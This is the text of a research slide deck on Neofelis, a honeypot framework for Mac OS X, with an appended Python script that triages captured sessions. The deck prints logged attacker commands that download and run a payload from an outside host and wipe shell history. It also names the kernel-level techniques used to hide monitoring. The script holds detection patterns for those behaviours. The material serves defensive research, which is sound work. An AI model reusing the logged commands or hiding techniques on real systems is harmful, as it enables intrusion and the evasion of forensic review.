Neofelis High-Interaction Honeypot Framework for Mac OS X (João Miguel Franco, Francisco Nina Rente) - PowerPoint PPT Presentation

Neofelis

High-Interaction Honeypot Framework for Mac OS X

João Miguel Franco, Francisco Nina Rente

{ jmfranco, frente } at dei.uc.pt

Software and System Engineering Research Group FCT – University of Coimbra


IBWAS'10 2

Agenda

  • Introduction
  • Honeypot Definition
  • Related Work
  • Project Goals
  • System Architecture
  • Tested Scenarios
  • Results
  • Conclusion and Further Work


IBWAS'10 3

Introduction

  • There is no such thing as a totally secure system!
  • Zero-day vulnerabilities are becoming more frequent
  • The sooner you have information on security flaws
      • the sooner critical updates are released
      • the fewer assets will be affected


IBWAS'10 4

Honeypot Definition

  • A computing resource, constantly monitored, whose objective is to be tested, attacked and compromised.
  • The data collected during the attack will be the base of a posterior analysis.
  • Two types of honeypots
      • High-Interaction
      • Low-Interaction


IBWAS'10 5

Related Work

  • Argos
      • Uses Dynamic Taint Analysis
      • Detects zero-day exploits
      • Does not capture activities during the attack
  • HoneypotX
      • Currently not supported
      • Older version of Mac OS X, 10.1
      • Low-interaction honeypot


IBWAS'10 6

Project Goals

  • Install and maintain a high-interaction honeypot for Mac OS X
  • Implement a framework
      • Totally configurable
      • Robust, scalable
      • Ensure integrity of the captured data
      • Generate statistical data
  • Well defined security boundaries


IBWAS'10 7

General Architecture


IBWAS'10 8

Information Capture

  • IOKeys
      • Pressed keys during an SSH session
      • SSH session information
      • Commands passed as arguments
      • Commands executed in a web-shell
  • IOEthernet
      • Incoming and outgoing network packets
  • FSLogger


IBWAS'10 9


IBWAS'10 10

Dissimulate Monitoring Activities

  • HideProc
      • __sysctl()
  • HideFiles
      • getdirentries()
      • getdirentries64()
      • getdirentriesattr()
  • Hide loaded kernel extensions
      • Remove the kexts from the kmod_info linked list


IBWAS'10 11

Tested Scenarios

  • Innumerable possible scenarios
  • Tested against two
      • Brute-force attack
          • Normal user with weak credentials
      • Exploitation of an HTTP web server
          • Deployed a web site on Joomla!


IBWAS'10 12


IBWAS'10 13

Results (HTTP Server)

  • Deployed a site based on Joomla!, which had the vulnerability CVE-2008-3681
  • Recorded 14 attacks
      • Hungary, Belarus, Portugal, Latvia and South Korea
  • 2 intrusions that took advantage of the vulnerabilities


IBWAS'10 14

Results (Brute-Force SSH)

2010-06-29 02:28:13 test França - Isle de France
    02:28:15 - w
    02:28:24 - cat /proc/cpuinfo
    02:28:36 - cat /proc/cpuinfo
    02:28:37 - w
    02:28:43 - uname -a
    02:32:38 - cd /tmp
    02:32:40 - ls -a
    02:32:57 - cat final4
    02:32:59 - ls -a
    02:34:19 - curl -O http://download.microsoft.com/download/win2000platform/SP/SP3/NT5/EN-US/W2
    02:41:47 - curl -O ; http://rohacker.ucoz.ru/DarwinBooT.tgz ; tar xvf DarwinBooT.tgz ; cd DarwinBooT ; chmod +x * ; ./darwin ; cd .. ; rm -rf DarwinBooT.tgz ; mv DarwinBooT .cmd

2010-06-29 17:07:24 test França - Midi-Pyrenees, Pamiers
    17:07:26 - w
    17:07:30 - uname -a
    17:07:52 - ls -a
    17:07:57 - rm -rf .bash_history
    17:07:58 - passwd
    17:08:23 - w
    17:08:25 - ls -a
    17:08:32 - history -c -d offset
    17:08:33 - exit
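As an added example (not part of the slides or of the Neofelis code), a small Python triage script for captured SSH sessions in the IOKeys-style layout shown above: the record format, the indicator patterns and the sample log are assumptions constructed to mirror slide 14, and the download URL in the sample is a placeholder.

```python
# Added example (not Neofelis code): parse session records in the layout of
# slide 14 and flag defender-relevant behaviour. Assumed format: a header
# "YYYY-MM-DD HH:MM:SS <user> <geolocation>", then "HH:MM:SS - <command>"
# lines, with a blank line between sessions.
import re

# Constructed sample in that format; the URL is a placeholder, not a real host.
SAMPLE_LOG = """\
2010-06-29 02:28:13 test França - Isle de France
02:28:15 - w
02:41:47 - curl -O http://example.invalid/t.tgz ; tar xvf t.tgz ; cd t ; chmod +x * ; ./run ; cd .. ; rm -rf t.tgz ; mv t .cmd

2010-06-29 17:07:24 test França - Midi-Pyrenees, Pamiers
17:07:57 - rm -rf .bash_history
17:07:58 - passwd
17:08:32 - history -c -d offset
17:08:33 - exit
"""

HEADER_RE = re.compile(r"^(\d{4}-\d{2}-\d{2} \d{2}:\d{2}:\d{2}) (\S+) (.+)$")
COMMAND_RE = re.compile(r"^(\d{2}:\d{2}:\d{2}) - (.+)$")

INDICATORS = {  # indicator name -> pattern tested against each command line
    "anti_forensics": re.compile(r"rm\s+-rf\s+\S*\.bash_history|\bhistory\s+-c\b"),
    "credential_change": re.compile(r"^passwd\b"),
    "download_and_execute": re.compile(r"\b(curl|wget)\b.*\bchmod\s+\+x\b.*;\s*\./\S+"),
    "hidden_directory": re.compile(r"\bmv\s+\S+\s+\.[^./\s]\S*$"),
}

def parse_sessions(text):
    """Return a list of {"started", "user", "origin", "commands"} dicts."""
    sessions = []
    for line in text.splitlines():
        if m := HEADER_RE.match(line):
            sessions.append({"started": m[1], "user": m[2], "origin": m[3], "commands": []})
        elif (m := COMMAND_RE.match(line)) and sessions:
            sessions[-1]["commands"].append((m[1], m[2]))
    return sessions

def triage(session):
    """Map each fired indicator to the (time, command) pairs that triggered it."""
    hits = {}
    for time, cmd in session["commands"]:
        for name, rx in INDICATORS.items():
            if rx.search(cmd):
                hits.setdefault(name, []).append((time, cmd))
    return hits

if __name__ == "__main__":
    for s in parse_sessions(SAMPLE_LOG):
        print(s["started"], s["user"], s["origin"], "->", sorted(triage(s)))
```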


IBWAS'10 15

Conclusion and Further Work

  • Neofelis is the first High-Interaction Honeypot for Mac OS X
  • High level of stealthiness
  • Filter network packets through pattern detection
  • Integration with an IDS


IBWAS'10 16

Thank you very much for your attention. Questions?

jfranco at dei.uc.pt
frente at dei.uc.pt